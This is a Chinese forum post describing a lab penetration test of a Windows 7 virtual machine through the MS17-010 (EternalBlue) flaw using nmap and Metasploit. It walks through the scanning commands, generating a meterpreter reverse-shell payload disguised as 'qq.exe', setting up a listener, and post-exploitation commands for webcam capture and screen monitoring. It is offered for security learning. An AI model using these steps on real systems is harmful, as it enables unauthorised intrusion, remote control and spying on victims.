alex! 发表于 2022-7-19 21:48:52

利用ms17-010漏洞对win7进行渗透

本次实验思路可能会有些乱,有的操作可能有重复或者不连贯的可能,仅供参考,大佬勿喷,欢迎各位评论留言,批评指正



【文章标题】:利用ms17-010漏洞对win7进行渗透

【文章作者】:Alex

【目标地址】:110.64.216.76

【渗透用时】:1h

【所用工具】:Kali–>metasploit平台、Nmap

【本机环境】:kali

【目标环境】:Windows 7

-------------------------------------------



【渗透过程】

1.永恒之蓝是什么

1.1 定义

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。



1.2 原理

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。



2. 445端口的作用

SMB(server message blick) 是windows协议族,用于文件和打印共享服务。



3. Metasploit是什么

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。



4. 渗透实验准备

靶机:Windows 7 虚拟机 ip(目标地址):10.64.216.76

攻击机:kali 虚拟机 ip:10.64.216.217

工具:kali自带的Nmap及metasploit攻击框架



5. 渗透实验过程

(1)以root身份登录kali,并初始化数据库启动metasploit

msfdb init 初始化数据库



msfconsole 启动metasploit





(2)扫描目标ip端口

利用nmap模块进行扫描,检查目标ip哪些端口是打开的

db_nmap -sT -T4 10.64.216.76 可以看到靶机的445端口是打开的




扩展:namp重要常用参数含义

-sP ping 扫描(不进行端口扫描)
-P0 无ping 扫描
-p 指定端口扫描
-sT TCP 全连接扫描
-sS SYN 半连接扫描
-sF FIN 扫描
-sN Null 扫描
-sX Xmas 扫描
-O 测探目标主机版本
-sV 显示服务的详细版本
-A 全面扫描
-oN 将扫描结果保存成txt 格式
-oX 将扫描结果保存成xml 格式
-T1,-T2,-T3,-T4,-T5 扫描速度


(3)查看该网络中所有主机和服务

host 可检查该网络中所有主机



service 可查看该网络中所有服务





(4)Metasploit端口扫描

auxiliary/scanner/portscan/ack ACK防火墙扫描





拓展:

auxiliary/scanner/portscan/ftpbounceFTP 跳端口扫描
auxiliary/scanner/portscan/syn      SYN端口扫描
auxiliary/scanner/portscan/tcp      TCP端口扫描
auxiliary/scanner/portscan/xmas       TCP"XMas"端口扫描


(5)搜索并调用ms17-010扫描模块

search ms17_010 搜索ms17_010扫描模块



use auxiliary/scanner/smb/smb_ms17_010 启动永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞




(6)查看模块需要配置的参数

show options 可查看调用模块需要配置的参数

右边Required为yes的选项说明左边对应的项需要填写




(7)设置rhost并启动模块

RHOSTS 即要探测主机的ip或ip范围

run 启动模块



(8)现在已拿到靶机的shell

ipconfig 进行查看目标机的网卡信息



sysinfo 查看目标机操作系统信息





(9)调用载荷

(9.1)新建控制台窗口,并查看 msf的payload列表

msfvenom --list payload查看所有可用的payload





拓展:

病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做“有效负载”(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

                                       ——— 摘自《决战恶意代码(美)斯考迪斯》P20



(9.2)在攻击服务器上生成连接软件,lhost为攻击机ip

msfbenom -p windows/meterpreter/reverse_tcp lhost(攻击机IP) lport=8881 -f exe > qq.exe我这里不知怎么回事显示失败了,可能是我之前已经生成的缘故





(9.3)之后检测qq.EXE是否为win7中可用项目

输入 file qq2.exe





(10)返回第一次的msf页面,调用侦听模块 exploitmultihandler

use exploit/multi/handler





(10.1)show options 查看配置参数





(11)配置payload

set payload windows/meterpreter/reverse_tcp





(12)检查配置

show options





(13)设置攻击机ip和监听端口,将软件发给目标机并进行监听

set lhost 10.64.216.217 设置攻击机ip

set lport 8881 设置端口8881为监听端口

run或者exploit 此时kali上会显示连接提示




(14)测试是否连接成功

shell 测试是否连接成功,如出现如图情况则说明攻击成功





对目标机操作命令拓展:

webcam_list查看摄像头
Webcam_snap拍照
Webcam_stream 开启视频
Screenshot 获取截图
Screenshare 实时监控桌面
Shutdown 关闭机器
webcam_stream 开启摄像头
screenshot 截取屏幕
run vnc 屏幕监控 (若对方电脑上有安全软件会不稳定或者失败)


【渗透总结】



1、auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞

exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击

2、use auxiliary/scanner/smb/smb_ms17_010 该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试

3、若控制靶机之后执行命令返回的信息出现乱码,则执行命令 chcp 65001 切换编码字符,然后执行命令显示正常。



【作者声明】

本文章仅供参考,此文所提供的信息只为网络安全人员进行学习参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行**操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

阿阳丶 发表于 2022-7-20 09:12:40

这是每天一贴啊:loveliness:
页: [1]
查看完整版本: 利用ms17-010漏洞对win7进行渗透